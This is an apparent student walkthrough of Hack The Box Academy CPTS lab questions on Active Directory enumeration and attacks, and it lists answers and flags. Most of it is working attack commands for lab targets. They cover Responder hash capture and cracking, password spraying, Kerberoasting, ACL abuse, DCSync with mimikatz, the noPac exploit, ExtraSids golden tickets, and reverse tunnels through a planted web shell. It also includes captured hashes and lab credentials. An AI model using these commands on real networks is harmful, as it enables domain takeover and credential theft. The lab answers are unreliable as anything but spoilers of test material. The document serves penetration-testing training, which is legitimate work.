CPTS labs - 12 Active Directory Enumeration & Attacks
Initial Enumeration
While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{} )
| # Method 1
# Go to https://viewdns.info/
# Do a DNS Look up record for inlanefreight.com
# Method 2
dig TXT inlanefreight.com
Results: HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ}
SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"
From your scans, what is the "commonName" of host ?
| ssh htb-student@$ip
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# On discovered host, run a nmap aggressive
nmap -A
What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name)
| # FRom previous sweep ping we also had this ip We run a nmap to verify
nmap -A
Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.
| # One thing you can do is running kerbrute. For that previously in your kali machine
sudo responder -I ens224 -A -wf
Results: backupagent
Crack the hash for the previous account and submit the cleartext password as your answer.
| echo "backupagent::INLANEFREIGHT:a44a64f117fef681:A2DD31752724815828DDEEA3CE0D14AF:0101000000000000007B3554C738DB0115079F6A10E61FB00000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hash2
hashcat -m 5600 hash2 /usr/share/wordlists/rockyou.txt
Results: h1backup55
Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.
| sudo responder -I ens224 -A -wf
echo "wley::INLANEFREIGHT:59927891910ba43b:D0177CE077EDE96746E10975D2F34CAE:0101000000000000007B3554C738DB018AC0B8E5A51B55310000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hash3
hashcat -m 5600 hash3 /usr/share/wordlists/rockyou.txt
Results: transporter@4
RDP to $ip (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!" Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.
| xfreerdp /v:$IP /u:htb-student /p:"Academy_student_AD\!" /cert:ignore
# Open Powershell as Administrator
cd c:/tools
echo "svc_qualys::INLANEFREIGHT:c64015117cfae8cf:6E069821C26309BFF0ADA96F643AA703:0101000000000000007B3554C738DB0164C7AEAE827BFB2C0000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hashsvc
hashcat -m 5600 hashsvc /usr/share/wordlists/rockyou.txt
Results: security#1
Sighting In, Hunting For A User
SSH to $ip with user "htb-student" and password "HTB_@cademy_stdnt!"
What is the default Minimum password length when a new domain is created? (One number)
| # This information is included in the sylabus. It does not require us to run any command.
Results: 7
What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number)
| # Connect to the pivot machine
ssh htb-student@$ip
ip a
# Sweep ping to discover IPs in the new the network range 172.16.5.X
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# rpcclient via the SMB NULL session technique:
rpcclient -U "" -N
# Now, within rpcclient terminal, enumerate domain password information
Results: 8
Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
| sudo git clone https://github.com/ropnop/kerbrute.git
# Typing make help will show us the compiling options available.
cd kerbrute
make help
# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each).
sudo make all
# The newly created dist directory will contain our compiled binaries.
ls -la dist
cd dist
python3 -m http.server 8001
# Connec to the pivot host
ssh htb-student@$ip
wget http://$ipAttacker:8001 kerbrute_linux_amd64
# Also download the jsmith.txt from https://github.com/insidetrust/statistically-likely-usernames/tree/master
# Run kerbrute from the pivot host
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc jsmith.txt -o valid_ad_users
Results: 56
Spray Responsibly
Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
| ./kerbrute userenum -d INLANEFREIGHT.LOCAL --dc jsmith.txt -o valid_ad_users
./kerbrute_linux_386 passwordspray -d inlanefreight.local --dc valid_ad_users Welcome1
Results: sgage
RDP to $ip (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!". Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.
| # Open powershell as Admin
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
Results: dbranch
Deeper Down the Rabbit Hole
What AD User has a RID equal to Decimal 1170?
| ssh htb-student@$ip
rpcclient -U forend
# Enter password when prompted
# In the console of developer tools:
number=1170; number.toString(16);
# We obtain 457 as the hex value for that user RID
queryuser 0x457
Results: mmorgan
What is the membercount: of the "Interns" group?
| # Connect to the machine via ssh
ssh htb-student@$ip
# ping sweet the network from than machine
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# After determining the target, we can enumerate groups with provided creds, and filter by "Interns"
sudo crackmapexec smb -u forend -p Klmcargo2 --groups | grep Interns
Results: 10
RDP to (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!". Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer)
For installing and using bloodhound.
Results: 13
What PowerView function allows us to test if a user has administrative access to a local or remote host?
Results: Test-AdminAccess
Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?
Results: sa
What is the password for the database user?
RDP to (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!". Enumerate the host's security configuration information and provide its AMProductVersion.
| # To RDP
xfreerdp /v:$ip /u:$username /cert:ignore /dynamic-resolution
# Get the current Defender status.
Results: 4.18.2109.6
What domain user is explicitly listed as a member of the local Administrators group on the target host?
| # To RDP
xfreerdp /v:$ip /u:$username /cert:ignore /dynamic-resolution
# Get members of Local Administrators group
net localgroup Administrators
# In the results you will see:
Members ----------------------------------- Administrator
The command completed successfully.
Results: adunn
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
| # To RDP
xfreerdp /v:$ip /u:$username /cert:ignore /dynamic-resolution
# With Get-AD
# Lists disabled users with LDAP and returns their samAccountName
Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select samaccountname
# Gets details about one of the users obtained
Get-ADUser -Identity bross -Properties *
# Flag will be in the description field
# With dsquery
# Lists disabled users with LDAP and returns their samAccountName
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" -attr SamAccountName
# Gets details about one of the users obtained
net user bross /domain
Results: HTB{LD@P_I$_W1ld}
Cooking with Fire
SSH to $ip (ACADEMY-EA-ATTACK01) with user "htb-student" and password "HTB_@cademy_stdnt!". Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.
| # Connect via ssh
ssh htb-student@$ip
# Enumerate the network
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# Enumerate SPNs in the Domain and we will see SAPService among them
GetUserSPNs.py -dc-ip INLANEFREIGHT.LOCAL/forend
# When prompted for the password, enter Klmcargo2
# Generate TGD ticket for the SAPService account
GetUserSPNs.py -dc-ip INLANEFREIGHT.LOCAL/forend -request-user SAPService -outputfile ker
# Copy the ker file content to our kali attacker machine and crack it
hashcat -m 13100 ker /usr/share/wordlists/rockyou.txt
Results: !SapperFi2
What powerful local group on the Domain Controller is the SAPService user a member of?
| GetUserSPNs.py -dc-ip INLANEFREIGHT.LOCAL/forend
# When prompted for the password, enter Klmcargo2. You will also obtain the groups that the user belongs to.
Results: Account Operators
What is the name of the service account with the SPN 'vmware/inlanefreight.local'?
| # Connect via rdp
xfreerdp /v:$ip /u:$user /cert:ignore
# List SPNs
setspn.exe -Q */*
# And pay attention to the firsts in the list:
# vmware/inlanefreight.local
Results: svc_vmwaresso
Crack the password for this account and submit it as your answer.
| # Connect via rdp
xfreerdp /v:$ip /u:$user /cert:ignore
# Go to tools
cd C:\Tools
# Import PowerView
Import-module .\PowerView.ps1
# List SPNs and returns their SamAccountName
Get-DomainUser * -spn | select samaccountname
# Generate a TGS ticker for a specific user:
Get-DomainUser -Identity svc_vmwaresso | Get-DomainSPNTicket -Format Hashcat
# After copying the ticket to the kali machine and removing blank spaces, crack it with hashcat
cat rc4_to_crack | tr -d \\n > hash.txt
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt
Results: Virtual01
An ACE in the Hole
What type of ACL defines which security principals are granted or denied access to an object? (one word)
Results: DACL
Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?
Results: GenericAll
What is the rights GUID for User-Force-Change-Password?
What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration?
Results: ResolveGUIDs
What privileges does the user damundsen have over the Help Desk Level 1 group?
| $sid2 = Convert-NameToSid damundsen
Get-DomainObjectACL -Identity "Help Desk Level 1" -ResolveGUIDs | ? {$_.SecurityIdentifier -eq $sid}
This can also be done with other tools such as Bloodhound, installed under C:\Tools.
Results: GenericWrite
Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne).
| $sid = Convert-NameToSid forend
Get-DomainObjectACL -Identity "dpayne" -ResolveGUIDs | ? {$_.SecurityIdentifier -eq $sid}
This can also be done with other tools such as Bloodhound, installed under C:\Tools.
Results: GenericAll
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
| $sid = Convert-NameToSid forend
Get-DomainObjectACL -Identity "GPO Management" -ResolveGUIDs | ? {$_.SecurityIdentifier -eq $sid}
Results: Self-Membership
Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
| ##########
# 1. Abuse ForceChangePassword: take over account damundsen
# Wley will change the password of damundsen. First, open Powershell as Wley
# Creating a PSCredential Object
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
Our user damundsen has GenericWrite privileges over the Help Desk Level 1
group. This means, among other things, that the attacker can add a user/group/computer to a group.
| ##########
# 2. Abuse GenericWrite: add damundsen to group 'Help Desk Level 1'
# Open powershell as damundsen
# Creating a SecureString Object using damundsen
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
# Add damundsen to the group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
# Confirming damundsen was Added to the Group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
# 3. Abuse GenericAll: Perform a kerberoasting attack
# Members of the `Information Technology` group have `GenericAll` rights over the user `adunn`, which means we could perform a targeted Kerberoasting attack and attempt to crack the user's password if it is weak
# Open powershell as damundsen
# Creating a SecureString Object using damundsen
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
# Creating a Fake SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
# Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:adunn /nowrap
# Crack it
hashcat -m 13100 $filename /usr/share/wordlists/rockyou.txt
Results: SyncMaster757
Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer.
| secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@
Results: syncron
What is this user's cleartext password?
Results: Mycleart3xtP@ss!
Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.
| # Open cmd
runas /netonly /user:INLANEFREIGHT\adunn powershell
# When prompted, enter password 'SyncMaster757'
cd C:\Tools\mimikatz\x64
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\khartsfield
Results: 4bb3b317845f0954200a6b0acc9b9f9a
Stacking The Deck
RDP to (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!". What other user in the domain has CanPSRemote rights to a host?
| # Open Bloodhound
# In Analysis tab, create a custom query and call it "Find WinRM users":
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
Results: bdavis
What host can this user access via WinRM? (just the computer name)
Results: ACADEMY-EA-DC01
Authenticate to ACADEMY-EA-DB01 with user "damundsen" and password "SQL1234!". Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host ( Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
| ssh htb-student@
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@ -windows-auth
xp_cmdshell type C:\Users\damundsen\Desktop\flag.txt
Results: 1m_the_sQl_@dm1n_n0w!
Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)
Results: 2021-42278&2021-42287
Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop.
| # Add this line to the proxychains file /etc/proxychains
socks5 1234
# Establish a tunnel connection
ssh htb-student@$ip -D 1234
# Now from my attacker machine, test the NoPac vulnerability. First we will run an scanner from the host machine:
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip -use-ldap
It will return:
| # it will save the file administrator_ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.ccache
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663
We could then use the cache file to perform a pass-the-ticket and perform further attacks such as DCSync. Using noPac to DCSync the Built-in Administrator Account:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator
It will return:
| [*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
whereas the NTLM hash is 88ad09182de639ccc6579eb0849751cf. Now we can use crackmapexec (for instance):
| proxychains crackmapexec smb -u administrator -H 88ad09182de639ccc6579eb0849751cf -x 'type C:\Users\Administrator\Desktop\DailyTasks\flag.txt' --exec-method smbexec
Results: D0ntSl@ckonN0P@c!
RDP to  (ACADEMY-EA-MS01) , (ACADEMY-EA-ATTACK01) with user "htb-student" and password "Academy_student_AD!". Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".
| Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Results: ygroce
Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.
| # Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser
Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
# Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth.
.\Rubeus.exe asreproast /user:ygroce /nowrap /format:hashcat
# Cracking the Hash Offline with Hashcat:
hashcat -m 18200 ygroce /usr/share/wordlists/rockyou.txt
Results: Pass@word
Why So Trusting?
RDP to  with user "htb-student" and password "Academy_student_AD!". What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)
| Import-Module activedirectory
Get-ADTrust -Filter *
What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?
| # Same as above
Import-Module activedirectory
Get-ADTrust -Filter *
What direction is this trust?
Results: Bidirectional
RDP to  with user "htb-student_adm" and password "HTB_@cademy_stdnt_admin!". What is the SID of the child domain?
| # As we are already in the child domain:
Import-Module .\PowerView.ps1
Results: S-1-5-21-2806153819-209893948-922872689
What is the SID of the Enterprise Admins group in the root domain?
| Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Results: S-1-5-21-3842939050-3880317879-2865463114-519
Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.
| # The complete attack would require getting the golden tickets.
# Step 1: get SID of the Child domain
Import-Module .\PowerView.ps1
# Result: S-1-5-21-2806153819-209893948-922872689
# Step 2: get KRBTGT hash for the child domain
# Go to mimikatz.exe file in the explorer and execute as admin
lsadump::dcsync /user:$domain\$user
# Result: `9d765b482771505cbe97411065964d5f`.
# Step 3: getting the name of a target user in the child domain (does not need to exist!)
# Result: hacker
# Step 4: getting the FQDN of the child domain.
# Listed above in mimikatz output
# Step 5: getting the SID of the Enterprise Admins group of the root domain
# Way #1:
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
# Way #2:
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# Result: `S-1-5-21-3842939050-3880317879-2865463114-519`
# Step 6: the attack
# Generate a golden ticket:
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Read the flag (make sure that the ticket has been created with klist)
cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt
Results: f@ll1ng_l1k3_d0m1no3$
SSH to with user "htb-student" and password "HTB_@cademy_stdnt!". Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
| #### Step 1: getting the KRBTGT hash for the child domain
secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt
# Example:
# secretsdump.py logistics.inlanefreight.local/htb-student_adm@ -just-dc-user LOGISTICS/krbtgt
# Enter password: HTB_@cademy_stdnt_admin!
# Results: 9d765b482771505cbe97411065964d5f
#### Step 2: getting the SID for the child domain. Obtain the SID for the domain and the RIDs for each user and group and filter out by Domain SID
lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID"
# Example:
# lookupsid.py logistics.inlanefreight.local/htb-student_adm@ | grep "Domain SID"
# Enter password: HTB_@cademy_stdnt_admin!
# Results: S-1-5-21-2806153819-209893948-922872689
#### Step 3: getting the name of a target user in the child domain (does not need to exist!)
#### Step 4: getting the FQDN of the child domain.
#### Step 5: getting the SID of the Enterprise Admins group of the root domain
lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins"
# Example:
# lookupsid.py logistics.inlanefreight.local/htb-student_adm@ | grep "Enterprise Admins"
# Enter password: HTB_@cademy_stdnt_admin!
# Results: 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
#### Step 6: Generate a golden ticket
ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName
# Example:
# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
# The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials:
[*] Saving ticket in hacker.ccache
# Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts.
export KRB5CCNAME=hacker.ccache
#### Step 7: Accessing another user on domain
# With one user, we will request the NTLM hash for another user
secretsdump.py $ControlledUsername@$hostnameController.$Parentdomain -k -no-pass -just-dc-ntlm -just-dc-user $targetUsername
# Example:
# secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross
Results: 49a074a39dd0651f647e765c2cc794c7
Breaking Down Boundaries
Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer.
| #### Enumerating SPNs
Get-DomainUser -SPN -Domain $TargetDomain | select SamAccountName
# Example:
# Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Results: mssqlsvc
#### Getting which groups is mssqlsvc member of
Get-DomainUser -Domain $TargetDomain -Identity $interestingUserSamAccountName | select samaccountname,memberof
# Example:
# Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
#### Performing a Kerberoasting Attacking with Rubeus Using /domain Flag
.\Rubeus.exe kerberoast /domain:$TargetDomain /user:$interestingUserSamAccountName /nowrap
# Example:
# .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
# Results: [the kerberos ticket]
#### Crack it
hashcat -m 13100 ticketTocrack /usr/share/wordlists/rockyou.txt
Results: 1logistics
Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc.
| GetUserSPNs.py -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName
# Example:
# Enter password: transporter@4
Results: sapsso
Crack the TGS and submit the cleartext password as your answer.
| GetUserSPNs.py -request -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName
# Example:
# GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
# Enter password: transporter@4
# Cracking the sapsso TGS:
hashcat -m 13100 sapsso /usr/share/wordlists/rockyou.txt
Results: pabloPICASSO
Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
| evil-winrm -i -u sapsso -p pabloPICASSO
cat c:\Users\Administrator\Desktop\flag.txt
Results: burn1ng_d0wn_th3_f0rest!
AD Enumeration & Attacks - Skills Assessment Part I
A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials:Â admin:My_W3bsH3ll_P@ssw0rd!
) in place for us to start from in the /uploads
 directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.
Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.
Submit the contents of the flag.txt file on the administrator Desktop of the web server
| # Enter in http:\\$ip\uploads
# Enter creds
# Run in the terminal
type c:\Users\Administrator\Desktop\flag.txt
Results: JusT_g3tt1ng_st@rt3d!
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
| # Enumerate SPNs with
setspn.exe -Q */*
### Results:
# MSSQLSvc/SQL01.inlanefreight.local:1433
# Also you can enumerate them by uploading the PowerView.ps1 the antak Choose File and Upload the file. In that case, the command line will be used to indicate the path. After that, you need to import-module every time you are going to use the cmdlet because the command line does not maintain the state. Everything runs in the context of the command.
cd C:/Users/Administrator/Documents ; Import-Module .\PowerView.ps1 ; Get-DomainUser * -spn | select samaccountname
Results: svc_sql
Crack the account's password. Submit the cleartext value.
| # Way 1:
# a)get information about domain
# b) Obtain the ticket
cd C:/Users/Administrator/Documents ; Import-Module .\PowerView.ps1 ; Get-DomainSPNTicket -SPN MSSQLSvc/SQL01.inlanefreight.local:1433 -OutputFormat Hashcat | select -ExpandProperty Hash > file.txt ; cat file.txt
# c) Copy ticket to the file sqlservice in my attacker machine and crack it:
hashcat -m 13100 sqlserver /usr/share/wordlists/rockyou.txt
# Way 2:
# a) get information about the system machine and the domain name
# b) get information about domain
# c) Authenticate using Kerberos with the user MSSQLSvc/SQL01.inlanefreight.local:1433.
Add-Type –AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList ‘MSSQLSvc/SQL01.inlanefreight.local:1433’
# d) Extract the generated ticket using Rubeus
.\Rubeus.exe kerberoast /simple /outfile:hashes.txt
Get-Content hashes.txt
# e) Crack it offline from your attacking machine
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
Results: lucky7
Submit the contents of the flag.txt file on the Administrator desktop on MS01
| # Way 1:
# a) We upload the file Microsoft.ActiveDirectory.Management.dll from the Active Directory powershell module and now we can use it to enumerate computers
Import-Module .\Microsoft.ActiveDirectory.Management.dll; Get-ADComputer -Filter * | Select-Object Name
# b) We need to concatenate commands with semi-colon. The following commands create a Secure-string object with the credential of the user svc_sql. Then we will use Invoke-Command to run a command in the remote host MS01
$password = ConvertTo-SecureString "lucky7" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\svc_sql", $password; Invoke-Command -ComputerName "MS01.INLANEFREIGHT.LOCAL" -Credential $cred -ScriptBlock { Get-Content "C:\Users\Administrator\Desktop\flag.txt" }
# Way 2:
# a) Upload chisel.exe:
# In your kali machine
python3 -m http.server 8080
# From the anktak webapp
Invoke-WebRequest -OutFile chisel.exe
# b) See if we have connection to the machine MS01 and what IP is using
ping MS01
# We obtain IP
# c) We connect with nc. In a terminal of our attacking machine:
nc -lnvp 1234
# d) In the antak terminal
# e) Now we have a connection in our kali. We will open a Chisel tunnel. For that, launch the chisel server in your kali attacking machine:
./chisel.exe server -p 8001 --reverse
# f) Now in the pivot terminal that you obtained launch the .chisel.exe binary (you need to upload it before)
.\chisel.exe client R:socks
# g) The connection in the kali will give you the port in which the chisel server is listening, in my case 1080. Modify your proxychains file (/etc/proxychains4.conf) last line to
socks5 1080.
# h) Now we can verify that the user svc_sql has access to the machine MS01 using proxychains
proxychains crackmapexec smb -u svc_sql -p lucky7
# i) After confirmation, now we can a
proxychains path/to/impacket/examples/psexec.py INLANEFREIGHT.LOCAL/svc_sql:lucky7@
# j) and get the flag:
type "C:\Users\Administrator\Desktop\flag.txt"
Results: spn$r0ast1ng_on@n_0p3n_f1re
Find cleartext credentials for another domain user. Submit the username as your answer.
| # Upload chisel.exe:
# In your kali machine
python3 -m http.server 8080
# From the anktak webapp
Invoke-WebRequest -OutFile chisel.exe
# See if we have connection to the machine MS01 and what IP is using
ping MS01
# We obtain IP
# We connect with nc. In a terminal of our attacking machine:
nc -lnvp 1234
# In the antak terminal
# Now we have a connection in our kali. We will open a Chisel tunnel. For that, launch the chisel server in your kali attacking machine:
chisel server -p 8000 --reverse
# Now in the pivot terminal that you obtained launch the .chisel.exe binary (you need to upload it before)
.\chisel.exe client R:socks
# The connection in the kali will give you the port in which the chisel server is listening, in my case 1080. Modify your proxychains file (/etc/proxychains4.conf) last line to
socks5 1080.
# Now we can enter to the MS01 machine using proxychains and the svc_sql user
proxychains xfreerdp /v: /u:svc_sql /cert:ignore
Now we need to enable WDigest. See this article about it: https://ivanitlearning.wordpress.com/2019/09/07/mimikatz-and-password-dumps/
For that, right click on Powershell and open as administrator in the target machine
| # Open a Powershell terminal and Enable "WDigest".
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
# Confirm that it is enabled
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
# And 'UseLogonCredential REG_DWORD 0x1' should be set to 1, not 0.
# For the WDigest Authentication to be in plain text we will still need to reboot the target machine. FRom the Powershell terminal
shutdown /r /t 0 /f
| # Now we connect again to the machine using proxychains.
proxychains xfreerdp /v: /u:svc_sql /cert:ignore
# After gaining access we can drag our mimikatz file to the desktop. Then we will right click on mimikatz and execute as Administrator.
Results: tpetty
Submit this user's cleartext password.
| # Now we connect again to the machine using proxychains.
proxychains xfreerdp /v: /u:svc_sql /cert:ignore
# Right click on the mimikatz to open as administrator and run:
Results: Sup3rS3cur3D0m@inU2eR
What attack can this user perform?
| # Use BloodHound to determine permissions. First, upload the SharpHound collector.
# Drag and drop the collector from your machine to the target, or use copy-paste. Then run the collector:
.\SharpHound.exe -c ALL --zipfilename enum
# Open Internet Explorer on the target machine and navigate to the pivot's HTML server:
# Upload the generated collector file to the pivot host.
